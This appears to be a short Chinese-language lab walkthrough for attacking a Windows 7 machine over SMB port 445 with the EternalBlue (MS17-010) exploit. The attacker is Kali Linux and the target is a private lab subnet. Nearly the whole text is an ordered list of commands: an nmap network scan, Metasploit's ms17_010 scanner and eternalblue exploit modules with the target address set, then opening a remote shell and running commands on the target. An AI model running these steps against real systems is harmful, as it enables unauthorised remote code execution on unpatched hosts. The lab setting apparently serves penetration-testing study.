概述
- 利用文件共享的445端口发起的攻击,通过445端口实现执行系统命令;
步骤
-
实验环境:
- 靶机:win7
- 攻击主机:kali
-
扫描目标网络主机及端口情况;
nmap 目标网络IP/子网掩码nmap 192.168.126.0/24
- 加载攻击
msfconsole工具
msfconsole
- 搜索永恒之蓝相关工具
search ms17_010exploit/windows/smb/ms17_010_eternalblue #攻击模块auxiliary/scanner/smb/smb_ms17_010 #扫描模块
- 加载扫描模块
use auxiliary/scanner/smb/smb_ms17_010
- 设置目标靶机
set rhosts 目标IPset rhosts 192.168.126.138
- 运行扫描模块,判断是否存在永恒之蓝漏洞
run
- 加载攻击模块
use exploit/windows/smb/ms17_010_eternalblue
- 设置攻击靶机IP
set rhosts IP地址set rhosts 192.168.126.138
- 运行攻击模块
run
- 获取shell权限
shell
- 修改命令窗口编码为UTF-8
chcp 65001
- 根据需要远程执行CMD命令